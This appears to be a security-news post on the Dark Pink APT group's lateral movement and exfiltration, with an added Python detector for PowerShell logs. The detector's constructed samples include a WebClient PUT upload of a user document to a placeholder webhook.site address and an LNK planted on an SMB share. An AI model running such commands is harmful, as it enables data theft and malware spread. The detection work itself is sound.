Government and Military Institutions Under Persistent Attacks by Dark Pink Hackers

The threat group has been active since at least mid-2021, primarily targeting entities in the Asia-Pacific region.


In 2023, the Dark Pink APT group was observed targeting government, military, and education organisations in Indonesia, Brunei, and Vietnam. The threat group has been active since at least mid-2021, primarily targeting organisations in the Asia-Pacific region, and was first publicly documented in a Group-IB report in January 2023.

After analyzing indicators of earlier activity by the threat actor, the researchers identified further breaches at an educational institute in Belgium and a military entity in Thailand. One of the group's PowerShell scripts is central to Dark Pink's lateral movement, helping it identify and interact with SMB shares on the network.

The script downloads a ZIP archive from GitHub, saves it to a local directory, and then creates, on each SMB share, LNK files that point to the malicious executable contained in the archive. When one of these LNK files is opened, the malicious executable is launched, accelerating Dark Pink's spread across the network and extending its reach to new systems.

Dark Pink also uses PowerShell commands to check whether legitimate software and development tools are present on the infected device, so that they can later be abused.

These tools include 'AccCheckConsole.exe', 'remote.exe', 'Extexport.exe', 'MSPUB.exe', and 'MSOHTMED.exe', all of which can be used for proxy execution, downloading additional payloads, and other malicious activities.

However, Group-IB states that it has not seen any of these tools actually being abused in the attacks it detected. According to Group-IB, Dark Pink's data exfiltration mechanism has evolved beyond simply sending ZIP archives to Telegram chats.

In some cases the attackers used Dropbox uploads, while in others they used HTTP exfiltration to a temporary endpoint created with the "Webhook.site" service or to Windows servers.

The scripts described above can also exfiltrate data: after locating the target files on the compromised computer, they create new WebClient objects and use the HTTP PUT method to transfer the files to an external address.
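The three behaviours described above (LNK files dropped on SMB shares, presence checks for the named living-off-the-land binaries, and WebClient PUT uploads to an external endpoint) all leave traces in PowerShell script block logging. The following detector is an added example written for this post, not code from Group-IB or from the Dark Pink toolset; it scans constructed script-block text for those patterns and reports which stages of the described chain have been seen. The sample script blocks, the GitHub repository name, and the Webhook.site identifier are placeholders invented for the example.

```python
import re

# Constructed sample script-block log text, in the style of what PowerShell
# ScriptBlockLogging writes. These are made up for this example and are not
# taken from the Dark Pink campaign; URLs and paths are placeholders.
SAMPLE_BLOCKS = {
    "block-1": r'$c = New-Object System.Net.WebClient; $c.DownloadFile("https://github.com/example-placeholder/repo/archive/main.zip", "C:\Users\Public\pkg.zip")',
    "block-2": r'$ws = New-Object -ComObject WScript.Shell; $lnk = $ws.CreateShortcut("\\fileserver\share\Readme.lnk"); $lnk.TargetPath = "C:\Users\Public\pkg\update.exe"; $lnk.Save()',
    "block-3": r'Test-Path "C:\Tools\AccCheckConsole.exe"; Get-Command MSPUB.exe -ErrorAction SilentlyContinue',
    "block-4": r'$w = New-Object System.Net.WebClient; $w.UploadFile("https://webhook.site/placeholder-id", "PUT", "C:\Users\victim\Documents\report.docx")',
    "block-5": r'Get-ChildItem C:\Logs | Where-Object { $_.Length -gt 1MB } | Remove-Item',
}

# Binaries the post says Dark Pink checks for before deciding how to proceed.
LOLBIN_NAMES = ["AccCheckConsole.exe", "remote.exe", "Extexport.exe",
                "MSPUB.exe", "MSOHTMED.exe"]

# Each rule is a list of regexes that must ALL match the same script block.
# Requiring several patterns together keeps single benign tokens
# (e.g. an ordinary Test-Path) from firing on their own.
RULES = [
    ("archive_download_from_github",
     [re.compile(r"DownloadFile", re.I),
      re.compile(r"github\.com/[^\"']+\.zip", re.I)]),
    ("lnk_created_on_smb_share",
     # CreateShortcut whose target is a UNC path (\\server\share\...) ending in .lnk
     [re.compile(r"CreateShortcut\(\s*[\"']\\\\[^\"']+\.lnk", re.I)]),
    ("lolbin_presence_check",
     [re.compile(r"\b(Test-Path|Get-Command)\b", re.I),
      re.compile("|".join(re.escape(n) for n in LOLBIN_NAMES), re.I)]),
    ("webclient_put_upload",
     [re.compile(r"System\.Net\.WebClient", re.I),
      re.compile(r"UploadFile\([^)]*[\"']PUT[\"']", re.I)]),
]

# Map each rule to the stage of the chain the post describes.
STAGE_OF = {
    "archive_download_from_github": "staging",
    "lnk_created_on_smb_share": "lateral_movement",
    "lolbin_presence_check": "discovery",
    "webclient_put_upload": "exfiltration",
}


def scan_block(text):
    """Return the names of every rule whose patterns all match this script block."""
    return [name for name, patterns in RULES
            if all(p.search(text) for p in patterns)]


def scan_all(blocks):
    """Map each block id to the list of rules it triggered (empty list if none)."""
    return {block_id: scan_block(text) for block_id, text in blocks.items()}


def stages_observed(blocks):
    """Sorted list of chain stages seen anywhere in the supplied blocks.

    Several stages from one host in a short window is a much stronger signal
    than any single hit, which is why the rules are reported per stage.
    """
    stages = set()
    for text in blocks.values():
        for hit in scan_block(text):
            stages.add(STAGE_OF[hit])
    return sorted(stages)


if __name__ == "__main__":
    for block_id, hits in scan_all(SAMPLE_BLOCKS).items():
        print(f"{block_id}: {hits or 'no match'}")
    print("stages observed:", stages_observed(SAMPLE_BLOCKS))
```

The rules are deliberately conjunctive: a lone `Test-Path` or a lone `WebClient` is everyday administration, but `WebClient` combined with `UploadFile(..., "PUT", ...)` to an external host, or `CreateShortcut` writing a `.lnk` onto a UNC share, is far rarer and worth a triage ticket. In production you would feed real Event ID 4104 messages into `scan_all` and alert when `stages_observed` returns more than one stage for the same host.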

Group-IB assesses that the Dark Pink threat actors have not been deterred by their past exposure and are unlikely to change their ways now. The attackers will almost certainly continue to improve their tools and diversify their techniques as much as possible.